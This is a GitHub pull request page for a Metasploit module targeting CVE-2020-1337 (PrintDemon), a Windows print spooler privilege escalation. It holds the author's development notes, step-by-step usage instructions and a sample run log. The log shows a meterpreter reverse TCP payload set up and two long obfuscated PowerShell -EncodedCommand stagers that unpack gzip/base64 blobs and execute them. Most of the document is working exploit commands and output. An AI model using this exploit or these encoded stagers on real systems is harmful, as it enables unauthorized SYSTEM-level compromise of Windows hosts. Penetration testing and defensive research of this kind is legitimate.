Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Rough attempt at CVE-2020-1337 #14414

Merged
merged 9 commits into from
Jan 15, 2021

Conversation

bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented Nov 20, 2020

Non- Functional

I'm out for a few days and will get back to this when I can. I figured it is mostly done, so I'll chuck it up here as a placeholder if nothing else.

The module works now. It still needs docs.

I'm unsure about why, but this module failed when executing the powershell script unless I maintained a ~200 comment in it. My guess is that when that comment is gone, the powershell command method splits the script up differently in a way that breaks it.

At this point, I've just chucked in a random string of 197 characters because that makes it work(TM). If there's a way around that, I'm all for it.
By moving to execute_string over psh_exec, there is no longer a need to the mystery comment.

Verification Steps

  • Get a meterpreter session on a Windows 10x64 (or 86) target with cve-2020-1048 patch installed (https://www.catalog.update.microsoft.com/Search.aspx?q=kb4556799)
  • Verify exploit/windows/local/cve_2020_1048 fails
  • use exploit/windows/local/cve_2020_1337_printerdemon
  • set payload [payload]
  • set [r|l]port n
  • set session [n]
  • set verbose true (optional)
  • set DisablePayloadHandler False
  • set wfsdelay 600
  • run
  • Reboot the target
  • Reboot the target (again)
  • wait a few seconds/minutes
  • get shell
  • be system
  • much wow

Sample Run

[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 3 opened (192.168.135.197:5555 -> 192.168.132.134:49675) at 2020-12-16 13:52:03 -0600

msf6 exploit(windows/local/cve_2020_1337_printerdemon) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-CL5L2IH\msfuser
meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 3...
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > show options

Module options (exploit/windows/local/cve_2020_1337_printerdemon):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DESTINATION_FILE                   no        Filename to overwrite (ualapi.dll by default).
   DESTINATION_PATH                   no        Location of file to overwrite (%WINDIR%\system32\ by default).
   JUNCTION_PATH                      no        Path to use as junction (%TEMP%/%RAND% by default).
   PRINTER_NAME      ZVRhh            yes       Printer Name to use (%RAND% by default).
   RESTART_TARGET    false            no        Restart the target after exploit (you will lose your session until a second reboot).
   SESSION           1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set session 3
session => 3
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set disablepayloadhandler false
disablepayloadhandler => false
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > set wfsdelay 600
wfsdelay => 600
msf6 exploit(windows/local/cve_2020_1337_printerdemon) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-CL5L2IH via session ID: 3
[*] Target Arch = x64
[*] Payload Arch = x64
[*] Replacing variables
[*] Running Exploit on DESKTOP-CL5L2IH

[-] Compressed size: 12608
[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit.
[+] Launching stager:
[+]  - Bytes remaining: 12608
[+] EXECUTING:
powershell.exe -EncodedCommand & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ' H 4 s I A K V l 2 l 8 C A 6 W Z T 3 M a W 5 L F v 8 r s P B P R C y z J D k f v s k R R Y A T o A g W v 6 O g F I K J s 8 2 S e J d k l 6 9 P P + Z 1 b L 3 r 2 o w 2 B K O 7 N P y d P n k z + V X 7 / 9 f X p 8 v 3 x 9 P 3 l 3 / / 8 5 + r 0 8 n / + s d k / f d 0 f / j z 9 9 7 u B / t 5 / e V 4 + T h 5 v h + / + 8 e 5 z G 5 c Y P c e x K 7 7 F e B L 7 V H Q x T t G 0 x X N U n 6 L p i q c Y D W L R x s e o Z n F s i z + j K u M h 9 H r b x j S K R V R 1 P H T x E u U n v v e D 9 / r e I G 4 j 6 q 7 4 E O N Z f r 4 a x F 1 b f O Y 5 v a 6 5 5 + / z D q l Y + X u p O P N 6 x K 7 y J n a p u I 7 b Q a y 7 4 m t U F 9 5 / 4 3 u T 4 P t n 7 B 7 w / C H F z y j P e o 7 X W R y 6 4 i X G k c / X / X r u L / w 5 t H x + j F O r 9 2 P b N 8 B v n f s F + 6 b x / 7 l 3 w H M v 3 K N 7 P 8 T I f v / u / X o h X n d R H P j / K R V v n O f n b 2 8 i d c W v q G 7 i w f Z O + N 5 D D C + K e 1 H x 3 v 6 U E 8 5 5 4 7 x 5 G 4 P / n H + W X 8 V 3 z v / c F Z M Y J u x T n M t Y d c U 2 q i 5 m 5 H P Y c k 8 R t 8 8 x S / h V x q w r 7 v n + J o r b q C Y x 7 Y q f P L 9 I e j + u Y 9 M W K Y b O z 1 O M S / A x x e 5 l V 8 y J 1 y 6 U t 1 E d a + K i + 2 T n D X Y + J N m j O K / a e C M u y f a W s S E P o 0 Z 4 4 f u d / C j K G C m + b f E Y t 5 9 i 7 v s H v B b c P 0 + y u + z I 1 1 f y q P + / j 2 G N 3 / f Y r 3 g U v N f 3 v / G q 5 3 4 T R / m 3 j F H E M n S e / r 9 K x R 1 2 y J 4 P 3 K d 4 3 f G c / F 1 j / 7 a V H y X + h c 8 / 4 U / 1 H L W f d 3 y v e n s a 8 L V v i 0 u M m x y / 8 p n 3 y t u R O r h x f F r d W + r z K P 6 I q g X P H 7 h P 5 2 y j T N T H l x h O O G 9 P P v a t 7 t U 9 C / I y d P 0 J b x f s u 8 e P V c R 1 j I 7 k s z E e s F P 3 r y M 6 7 D p 0 8 U q c 5 P e C e 4 S r P / F X + L 4 C n / t O / l H X S f E G L + C j M q 4 u 4 K J p 4 4 p 7 d 1 3 8 4 v 0 2 c l w U 1 w I 7 a u d / w v + f + F z 4 f u J 5 2 V d T D / L z 1 T h K q g v l P d d H I j 7 T G D b C C T j o w P 0 v / N Q 5 Q / A k P D x y j 7 4 / j 9 G E z 3 / z m l K x i + q Y + U i 4 O B E f 4 V B 2 z I m 3 8 F b A R / s O / 0 v w 1 H C v 7 l v w 3 J r 8 i 2 d 2 8 J r w p P g a l 2 v y X j b 5 O e F R e a g 4 R / f r 8 1 Z 4 D 9 f t j H v 0 e R 3 x m 3 w J V / f E U 7 i Y k r e E X c M Z + P 8 C H n b 4 W b q u j A f V z S / i v g r h F b 7 r V E 8 j z o c f W n C f i M M x d L / u k 1 8 / 8 F P 5 e i N u x 1 R s w O E + i F e N v a 6 z g + v i G M u k 7 8 t e 2 S M / l Z / Q u U P x G X W k 1 0 O Q 3 w F 4 + s 3 5 w v U N z y 0 C f N b Y 8 y d + C z e / e / s 7 8 i k c 3 x r P S f F Q X u W f e V I 4 / Y v 6 O + B H r u 8 n 8 u S 4 q w 6 X x E E 4 2 c B H i v 9 D z 5 d H 8 C b c i k d f M 4 6 U R / H p Q 6 u 8 K Q / C y Y Z 4 b s C D 7 l 0 Q 1 6 q h T m 7 h C e U 5 c f 8 K X A / P x G H i f M F r I / N Q 3 f v 7 E 9 7 e w O O K y x b + k h 3 z E K 5 L 2 7 f m v g T O h Z M a O 2 W P e O 0 9 f K r z v l M P R / h K 9 y u P 6 l v C O f X l v l G M j L e g P l U / o T r R u b s U T / a f v A q H u v c R e 8 X j H 6 n D B f W g e B / d 1 w b i Y f G g c C S e + E B d L y I / t 3 U / m A m f 1 L X j n f k D P h M / 1 J 3 u U R 0 1 n b 4 / N h 6 X 4 E l 2 7 7 B n D w / q v A d w o u f m n K v 8 + L 5 s X 8 n 7 x v m 7 A Q f u 8 8 J b C c + p z h d 9 n Q 2 I q 3 h l w P 3 7 C O d t 5 f p 1 / 3 F 8 j 9 Q x / 3 d / S r K f 5 4 7 w w h f i N T N / i a + T e G t 4 B F 9 X r l / w m u N y B Z / o H O W 9 V l 4 y / h S P C X F d k 3 / F c w X f g v d Q P p T n R D 9 Q H T y A B z 2 3 o b 5 0 7 g 4 c y H / h e k b d r l 1 n X c Z 1 V e f 6 V r w O 2 K v 7 a v c V x + O n c R S 6 R + c c w Q O 6 A T 4 q z b 9 f w Y v q 9 U y 9 y / 4 x d T u F b 8 W / N f b T x + B T 2 b 9 t 8 f e c c a x z l k l x F l 9 O n Z c S X D 3 y q n 4 z 4 X z V V 8 3 n u Z 4 7 e P q K u l u i k y r r o x L c L I l / 5 b w 9 W V + k H I 8 a e 1 W / R + K p / C 6 J u / A 1 x W / l e d b 7 k e B 5 + p J 5 x X 1 z Z h 7 l X u F l Q x / U 8 + Z f 5 U V 1 N c Y P x X d A v P T / C z j a u f + 0 8 M C r + S y w r + 8 f i u O B + I / t 3 2 O v r 9 7 c 1 / x c w / N n 8 w f 9 V v c s r C c u 4 L U i n n v 6 3 N D P P W P 3 0 e 9 b / N j x / J r z y V / k / p h s T 9 A v 3 + C 5 I / g W j m f g Q f b u 8 V 9 9 Z G P e a f n e X / i p O j m D z 2 m X + S m R N 9 W B / P 6 D u C u f H 4 m j + H B s X Z a o p x k 4 u c P v l X E 1 A 5 + v 5 K O G T 0 f m u x X 9 Y k M c 9 f 8 l O l J 5 3 f G 9 0 n 3 y i + u b v q K 4 N O g 2 5 W U F j 5 g H s b O j r l b w n 3 j t j X N O x B M c 4 4 f s m M M / 4 q u Z z 7 0 B Z z e u 7 1 Z + U z / 0 C c X p y K v q Z e l + 0 4 K v e + K w I V 9 6 z b r I e u A O H N 1 Z J 3 f U 4 8 W 4 7 n X E o c f D q c 3 6 U d 8 b 9 T r o v s f x f Y 4 z P N r Q 5 0 b W / e g 8 4 X m d x H f Z n n G u M 8 V b d b 3 H P 8 V / A 8 + U 6 D L h f E x 8 9 T k 6 v e d P 1 e 0 A X I j P n n i v v v 9 G X z 2 i 4 0 v r 9 M + 5 P 8 H v H e c 2 4 M P 3 o Y f g M + V 1 4 3 o 2 T s / o F c X l m v g Y Z y N 4 t 9 d T 3 C N / D t w z d D 9 a Z f v k j / C 1 B z f y Q / m t 7 U 8 n H a f P t 9 Z X d d b J Q + Y K 2 S M / t 5 5 z n q k f 2 y v c P l M n O + v E E r 7 5 2 M 9 B 3 8 l H 0 + v M B / S h 3 j / A f 5 X 1 U m l c o T O F t w Q P K A 5 7 7 N J z O 5 5 X v a z B p X R u w h / 5 r 7 y Z x z f M c + K T N f g B X 9 T 1 2 P p h g z 0 H 6 / 4 W H f G t x 9 H e 8 Y A v s v 6 + w q 6 5 5 z v 3 j V v e r / B b + E h 8 X / w r / N z Q 5 + f m l U / w 1 x P 2 P t C 3 1 A 8 S c 4 / u X 9 G f d f + e f q i 6 O N n f Z 3 S T z 9 + 6 b g e y G 3 1 q 3 n l E F x 3 w A 9 1 J v 8 x 5 3 O C v + 6 p 4 e g m + x 8 b b m T z M / H 3 3 9 y f j z v 2 r I e 4 F d t W O T 2 S c q L 4 S c R n x v P i A / k X d D n 1 P w / 3 y 6 4 f n w l 5 v z e E Z e D P A v / X 3 C L / k z 4 R 4 J s d 9 R l 1 v 8 U P 1 / o b d U 3 h j b D 5 2 / 9 u R d 9 X p D n 6 r P E f s w E 3 T Z d 5 J 9 H / h a 4 k + k P 8 b 1 w X z B P q u g b 9 u r I O 5 Z + y 5 b O M + Q t 5 G 1 v 9 3 n t v c f z w / / u S 5 G f 0 / 3 / O D 9 w / c N 6 Z v 6 V z X D 3 P Z M d s l v q l T z 0 / W 7 x d 4 x z x 6 9 P w C T 8 p O e J v + K J 5 L t s s 8 e Q a n 2 z b 3 8 R X + y K 8 t 8 1 W e U 2 v 4 c E N 8 4 B v j o S X / 7 4 0 L e F 3 1 u y d u z H U d P N v R L 3 7 S V 4 6 c N y S v 8 N u Z z + f k / e Q 5 2 X N B R 7 4 e q B f y E L 3 d n n M n u e + o v v R q X G 5 d x 8 7 P p t + L f M x 2 E 8 c Z 9 g 6 x Y 4 b + E e / t 6 R / C 1 Z x + Q p z c 7 3 y O 8 7 5 k L y B 7 H 6 L X m e x F 6 M N d n v t 2 f V 1 u 4 T 3 F Z Q E v y o 8 t 8 4 H s m V n P M 9 d T T 0 f m K M 8 3 m e c m G Y / w s e N 0 g w 5 a m E + 6 n u + Z 2 4 Q T 9 5 2 h 8 X N D n a 2 j x 6 G / 1 / V 4 K o n b h n o 5 m b + p Y / J + R g 9 V 1 M e 2 z X P N 0 n 3 e d v 8 G P 1 v r k Q t x W / L q P k Q / Q T / r v B X 9 X H H e o 8 u E r 7 V x x l w L P 7 c 8 t + Z V 9 u 6 d n y 7 P I 9 I R r v 9 1 m / d E c + Y A 6 3 7 6 a e B H h / / L y H P k j j l y x H O c b 7 3 y 0 X l 1 X Y M D / D R O F r x f E s + h 8 X A B 7 1 v 4 v b R / j 5 4 X z A N t 5 h / 8 T 7 m / 5 L i 6 n / 2 9 3 7 C u 9 9 y e 5 5 Y r 6 k L f G 2 H v F n 6 h T 7 V 5 n t 8 w v 6 H f 4 Y v K + M 7 9 E 1 x 5 f p Z d e Z / x l T y k f l 9 w 8 h z S g L O d 9 0 y e L 9 B x 6 I M B P H h N H m v y x t 7 E f b e h r q 6 t H 5 m v S t v X 9 X s U 8 8 w O 3 m G f A Z + V r p 9 J 1 n W K s / K U 3 O + Y Z 5 j z z + R t 4 z y i 7 z P v X e P X D B 6 X H d a V s n N H v y 1 d 1 5 / 7 f v q T u K z p 1 8 x H + K f 7 j 8 b r J c + P J b g E f z P y 8 L 6 f O 0 e u e 8 / d 3 k / s O W e L f 4 4 r c + 0 l 9 1 / Z u 4 5 + H u V + 8 b z 6 + 6 v 3 d 8 z X 8 r N x H / V 8 8 J X z r V v R z 9 Z V M / j C d X F i n 1 O a 9 7 6 A 6 7 3 n R 9 f t d a + b H / v 9 3 p 7 P 1 4 5 D y r q m Y n / B 3 F u T R + / D P N e w r 2 L / R 9 + B V + j f 6 L Q x O h c 7 B 5 k H H A f s K / / D U 9 S H e P o B P 4 X b B f O J 4 t S g N z z / k b + W + n j q 9 c Y 3 + E Z x r a z P q b 8 8 h 6 1 8 L 3 y m + w 6 e a y f s v z r v U + H B y n 3 5 m + d 7 c D V y 3 M 0 3 y f u W x P l / U K 8 H 6 s a 6 N c + 5 n r P E M 3 f 2 6 5 J 1 R + l + d 8 / 5 a + t s 8 9 n c + e m y 3 X P q T P i 3 n h E O 9 5 H 3 d H P w x v 6 k z b z i P d T I f o + s G y P v O 9 b U u / T a y n Y 2 W S f k O W 7 h e 9 l 7 5 j 5 f k l / p 4 l 9 9 f 7 n m 3 D 3 7 h j H f C 8 8 X t X m H P p P n j p X 3 A 5 6 / H I e Z 9 4 b u Y 8 u M R + 7 x X v y C v d L H 6 z x 3 h v e / K + f J e X k 1 / l w / 7 G f o A w m e 9 a v 9 V r + w D p S d W + N p Q L x q e O 0 B 3 v F e I u + x 5 j 0 e k u 0 6 g 7 O b n k d 2 3 o P h t 3 B f u z + e 2 Y t e m 5 / g y 7 H x N w e v J + K h v m i 9 q 3 q 4 A 9 / w H H x L n z D P 1 N T h x n M c + / 9 h n f c h f + + X x 5 M c B 9 X z j D i j v 9 A f i t / e u o i 9 J f F w n 3 z i u T X z O f s p + L H y v O E 9 5 c x x c t 6 2 4 G X G 3 m T Y 5 r k d n H k u 9 p w y 7 f f a c 8 5 d s 7 c D B 4 6 r f + f I O t H 1 0 u + j F G f F c 9 b v 6 5 9 8 n v n t U 9 Z z w s / K e n S C n 9 / I R 0 N f Z 7 / U Z R 2 5 p / / w O w r n y a 9 D y n P p P P K 8 m Z h T x Z t z z / s z 6 v r K e x j 2 X 1 n X f e D z p e f 1 A C / f q J u D 5 8 4 z u v 3 N e w f z g f V V g 3 2 p z X 1 t w 5 6 h Y h 5 k L k U / C 2 / s x 7 w / m 1 C v D Z / X 9 B X x g O 4 d 5 b g Q 7 w n 4 N z 9 7 n 1 S 1 P Z + i Q 6 h T 7 1 P m 5 i n P o 2 W e t 8 f s e d m H p N y / s x 8 v 3 j N 5 j 2 W 9 N C X e R 3 R L N c v 9 T z i Y M u e N n S / P h Y 6 L f 7 8 g f s 9 5 b 4 n e 9 p z 3 T L 1 c e R 9 m H n B f M h 6 S 5 + L I O k 6 f T / t 9 e A P P o z v R h y O f / 9 r r g w 3 5 u W M + Y Z 8 O H o W L u f H h c 8 z T U 8 8 T 3 j + 9 O i / e H z 7 3 v 8 N Y j 3 o v c W d 7 n U f r 4 S 1 1 6 z m V O S 6 R / + S 6 b 7 N O 2 o P v o f G T 5 0 b z 7 C f + / 2 i 9 a r 1 5 z n P Q 0 P H M e C I P 4 z L v U c b e 1 x Y 8 f 7 C + b L B 7 A U 6 3 3 s M G / P n i O Y r 4 5 j 3 E + 7 y H p q + 0 z E v W g z v P E 7 O 8 5 8 q / D 1 x l P U 2 f O o P 7 g f W d e f o T / P C h 1 4 s V 5 8 7 J d 5 6 L l v 3 v I v 6 d Z W M 9 3 8 C b H 6 3 j r I e 9 d 3 n f 6 8 l 7 z p 1 6 P 2 y 9 d 8 5 z R 5 4 b F M 8 9 f u U 9 H H N 6 1 h N z 4 9 z z i 3 + X S O g t 9 m v k S 3 E 6 R r 9 X o v 8 M r X c b 8 u Y 5 Z u z f u e 5 4 r b m X 3 8 P 8 + x r x C e + D T 3 2 / 3 Z H P y n z x w 7 8 b e e 6 Y 5 N + F V D d 5 v u 6 I 3 2 f H y b 9 z e k / V 9 f d N v J 8 0 / 3 l v 7 v 1 x 8 h y f 8 u + j 5 S T r g c o 6 J P X z 7 E v f p 8 / e 8 5 r P L p n H P b / n 3 2 d O 8 J L O 8 + + Y w z r v G d C X k e f I l X 9 H c R 4 9 J 7 u + / b t J 4 f 1 K z R y U 5 4 b a 8 2 X 7 t 7 5 k D 3 T p 9 y t N 3 u d m / T a F b 1 2 X o z b H F T 0 P P k v P i / 4 d a Q t / l O 7 L W / c h 9 D V 7 L X R T 5 b 3 p N b h v U v 7 9 Y + 3 f 7 Q b w W a J u G v 8 e f A b 3 7 8 H l 0 v s Y 7 3 k S 9 b S l H t F P / H 8 U W X 8 K N 3 k f 7 3 3 s Y 5 6 f i F M J D j 8 S l 8 Z 9 + c x 9 A + + v H R / v + V 6 t v z 0 X O g 8 T 6 1 z / T m 3 d 3 3 h + 8 O + D A e 5 K 8 v P u H / / 1 r n 4 + P b 3 7 n / 8 F v f p X k I E f A A A = ' ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) )  -InputFormat None
[+]  - Bytes remaining: 4608
[+] EXECUTING:
powershell.exe -EncodedCommand & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ' H 4 s I A K V l 2 l 8 C A 4 W Y T 3 P i S h L E v 8 r e v B v x D o z / h e P d S i A E N o J p k G C k j T 2 A I G S b G e M x H j T 2 p 3 / 5 q + Z t 7 G 1 9 I R D q 7 q q s z K x q / z t 9 O T 2 9 H V 5 + 7 F 7 e / / P n n 4 v d + / 8 8 W K 7 f n t a b 7 7 t / X v T 0 d / l 4 n P 8 Y / + g P L v 6 4 q N p k Z s P W q p C 8 W 5 p b E Z K f N m p t Y f Z h a W V 5 l 2 S W j f U 9 + W W j x u r W T t Y / 2 k O X p D b K L b e k s G F l G / 8 c 2 7 x N P l n X d M m r D c 3 K N q k s 7 e m 7 f V q 2 t 0 2 X D D h n H t g v 5 / u 1 Z Y 3 N Q v J o w 9 J W b X J j o 4 P 2 t d + W N j Y 3 P U 8 P V n V 2 a c O G c 5 5 t Y L Y J y d Q G q a 1 M 7 w / G r E v P 6 1 e W e T 4 T 4 t L n w I b B G i O P n u 1 C s i a O x q y z Q S D e g 2 W V z b v k n n O W b f J i o 7 E t u 6 R n 6 d 7 q k D z x + 8 b X d 7 Z o k 6 W l X d x P 8 S m O 0 t I U P F 4 t K 2 3 S 6 f z U 3 / t N n n r + a C M j v 5 5 l d z Z t 7 Y b 9 q y 6 Z E 1 d h + h w 5 7 j f s k 7 f K T + 9 r f c K 5 2 5 C o D q 1 + t y v y 3 r W J c B B u L X k 1 F k L S t 5 H e a 5 X X o L G i V R 3 4 5 P m g s t B p n 9 T z f O P 9 q d k X 6 q G 6 j M B d e X 0 S Z + 5 1 S f m c w I d 1 m z x Y l o P H v Q 0 P 4 H E F D 4 R T Q d y L o H 0 H L f V / s 9 H e 1 p Z 8 p e 4 V + I s H W 0 u + w 5 d 5 E F 9 G p e K z H n U J Q b z K U m s C 9 R Q O r e L R e d M u 4 r o J d s 3 + c 8 e J O O C N + B D I y 3 k j X q W 2 M 8 U n 3 E K b d P B x y f 7 C p Q G f U b C 6 U 1 2 V v + I b g 6 P q m B J / Q 3 1 U R + U l 3 I g j q T 3 + D t 7 v b R n g 4 8 E K 8 s w 8 j 9 y G e + q h 9 d f U 7 Q t 5 6 L 0 H c C 7 B W X U t 2 D f i M C S e H f E q T q 1 / 4 l P n 3 H q e Z 7 w V z 5 L 3 h O M K n L X / T 8 c Z X u u 8 3 H k R i K v k P a 1 / h r d r + J c 5 L x e W H t H F J 3 k q r z H x L D r h p n i q I D z E T + F z y 3 k z d C I + b 0 y 4 C 0 f x 6 p P 8 9 H t N X I F 6 S E 8 b 8 F D + D T q Q n s T X a 3 Q k H u t 5 I I 4 H z i t d D y X 8 u 4 E H p e l c 4 T 9 l P + E 0 B 3 / h L D w m z s O z z s S 7 H + A h X e / x B + X x G 7 6 r f h / o c d H a G 3 k t W c / z k J z w A 7 3 / A Y 9 z x 8 / 9 J z v X J 7 V 0 T H 5 L P p 2 P U S f K + w 4 e 1 O D i + X s + 4 r n 0 o u d P x F 3 j e + L R 0 v 2 s I e 8 3 8 C 7 I T 3 G W 7 K N 1 0 t s 7 u q 1 d f 4 7 H p f s Z O k i v W V c Q b 4 V u h O P U / S t F h y u + q 4 6 u B 9 X 7 2 9 n H 3 p 1 H H f G O 0 f 0 T u h B v r o i n w o + I J 0 T f K u H T C N z w r R b f / I Z f b Z x / e 9 b 3 0 c 0 a / D L X a 0 K c A f 9 T 3 I r j x X l I X N k R H i 6 o h / N e u G + I S 3 k H c B m l M T / x I o c n W i 9 f m 1 p a i l + q 3 8 D 5 O w P H K e + n 6 B C d B + I 4 s H 5 G / 9 D 6 g j q x D 3 6 m e s i H v o C H + H F 0 v I L O k W + s Q + S x c B m 4 H 3 o + y g P / l 3 / M A n k d I 5 8 V t / Y 9 u Z 7 x G f m Y 8 v 4 N T n o e / Z B 4 o 4 4 T + L N 1 v 4 P X e k 9 4 b x x f + o Z 4 L 7 4 W n f Z X P O J P n z w b z 3 8 P X x 7 R 0 R p / 0 T p 9 n x D H n N 9 V B / F s Q d z K I 7 f B H n z u 4 b X q 9 + 5 5 G X 5 x A J 8 r 4 t t 6 v y 3 F K 3 0 X H g v 3 o T F 8 u S R u + d L 4 r J t 3 c B I P 1 + A 6 A x e d W 6 K D k f v a D X r c 4 C P C Q X h 9 Q x 8 l / M y 8 P h / n f D v 0 M M e 3 Y n 6 3 x L c g T + G q P n / l v o G / U X / 6 s M 5 X v U r 4 M 6 W u a R X 7 W A a f 8 W N / b 4 Y / q 6 / t 4 V / w v k W f V l 3 1 / p K + L r + Z w B f 3 b / m 8 1 v t 8 Q H y + r / v c N / J U 3 i d w + R u 3 J f 1 O f J 6 C r 3 g g X q z w l x q f i v V / j b w G R + 9 n z 8 R d g q d 8 a c s 8 I l 2 K z 0 P 6 p 9 a X v C + + r 8 H t g X 7 X v w P f T / T Y s P / A + + h 9 7 C P g R n 8 S v i P X u e t y y x w 0 p E 8 T R 4 j 9 y / 2 K O E r 0 d R l / V / 7 K S z 7 7 H R 7 N 8 R f p Q P o 9 w d c d + P r 8 J D y j D p 6 J U 9 + 9 n 6 7 8 d / f j T / J b u Q 5 9 3 n g C j 6 n j e y c e 0 1 f 3 + M o j c S i + z v u C 6 y T H P 2 f k M X d / u Y N X 7 o M L 8 p R u t / R 7 8 U N 8 n 3 F u w d z k 8 x D + d W A e q F i v + m Q + l 5 E 3 f R + / V l x 6 7 8 P 9 A L 8 U n 2 r 8 Z O h z w g L e T t G F 6 l j T / x R X g f 9 G / F + J p / T 5 q G G O c / 2 U + K T 0 6 L 6 d 4 m e 8 1 6 G r J 3 T o f V U + v 6 V P i j 9 b z t d 7 q u + J + a F E N 8 J / i V + A E 3 U A f 3 C T H 1 c + v x y i f v R 9 C n 4 j r 8 8 n + U 3 Z R z y N v n P g e R / d 5 s x 5 4 s e O O U K 8 K p y / R + p 0 O s d 5 I q 8 p / W z Q n u f F A N 4 h z j f U q S T v 5 / O 8 + n z G p 0 a P j e N q k a f 4 t / t U i U + 9 + n w N P / Q p H 7 g E 9 9 r i H C O + D 9 l H / L 0 H z y 2 8 T Z 2 n 1 8 S 7 x l + F a 8 F c M v L 5 w / N f 4 t N D / I P 5 6 8 C c 9 o X 3 F 8 y R 7 I P P K B 7 F e Q V f C o v + r s 9 r e L V i T l I 9 l u A r 3 g Z 8 Z + D 9 3 / 1 Z / J + f + + s R X i z x C c V f M P e r v q 4 n 1 n f q l 3 E O m L H P w u e 3 E n 3 f E M + K u Y J 7 A H 4 7 8 r m j B 6 5 b n w M b e H 6 F X 5 Q W + 9 4 c 3 + d c 4 h K v p v h D 5 u f 8 O u P i O O U + h / z d 1 z z O V e x b 8 l / 4 w r l x D v f 5 c I E O h q 6 P j v c b 5 t y B 9 4 k + f q E 4 f b 5 v 3 H f l 8 8 x f w t t 9 R f k 2 F u u 3 8 7 m s J c 4 X 1 z 9 + J T 5 V P s / v 4 d c 7 e R f g J t 5 s 0 Z H q 7 X O h 6 r j y f t / F e 8 f A 5 w 3 v y w W + K d z W v D / 0 + b 8 G L 8 9 j 6 P 3 w B 7 j V z I c D 5 v H Y J 2 t 0 w H 3 H 5 6 i U 5 z 3 H 3 c / L m T u e y O O B d a n 7 9 4 R + 0 a A P 4 d r 4 H O Z 9 5 n S + Z / X x p c L n i j 3 x r e N c p b z V X + Y h 3 u N K e K r P G j x 0 z h p c 4 3 z s 8 5 X 3 i 9 T P P b F / j X + p D j 5 n y r f n 6 F v r G v Q 0 8 v t b w v c d O A u H X R v n p 8 r n a q / / T / C t 4 Y / i 3 J 3 v E 2 v m Z 9 9 X / F B e w u G F 3 2 f + e 2 D d 1 7 M P 5 n 4 u / s B c 0 E n X w m W J P 4 m f l d + P e s T Z 5 1 z t 7 / O 4 + H U b 8 e N e S J 8 H X 3 A R L 5 k z y U P 1 3 3 H P 6 T P P R 3 3 4 / U b 5 r 7 k / q F 4 l z 7 n v B u Y v 9 X H H p c f 7 H X G V P s 9 W 6 H z C 9 z X 3 I u E 2 p S + I Z / o c U n + / b 0 q f j d / z j f 0 m 7 s / w T 3 h M / P 4 Q o k 6 l o 8 b 5 h w / h 8 y V 5 1 + 7 / 4 J K 5 H / X R b + 7 3 J d d n H 7 y E v / u 4 f P 3 q X C / 3 5 y 0 4 C V e / R 0 l / O + 6 j w m P p 9 8 8 7 5 i T 3 4 6 n f + 7 w f 5 z 7 3 k K / 0 W a B H 4 b 2 g b 2 p 9 H i J v p 9 R d P r x k T h K O X l f N 1 3 6 f V D 1 K f F j 7 r P C v e O / / e r 5 X T f H j 4 H N 8 a l + D v V h / b w / B X q 3 f 2 Y q 8 F E / D / w P k 3 9 r v F 3 1 H 8 6 L 7 y c Z 1 h 3 8 z 3 + f x / x 7 y g U 3 7 / 3 5 n P r 2 D j 5 o P e j Z r 7 Z b 4 a 7 / n 3 a H v z u 8 b 3 v f z c z y a p 5 i H F E f l f h r Y f + j 9 0 u z w 3 7 g z n 6 M O 7 D M 2 5 c P 9 B N + I f u t 9 b U G e g 6 N d / P G P i / K 4 e 7 v 4 1 1 9 r S r k G Q R I A A A = = ' ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) )  -InputFormat None
[+] Payload successfully staged.
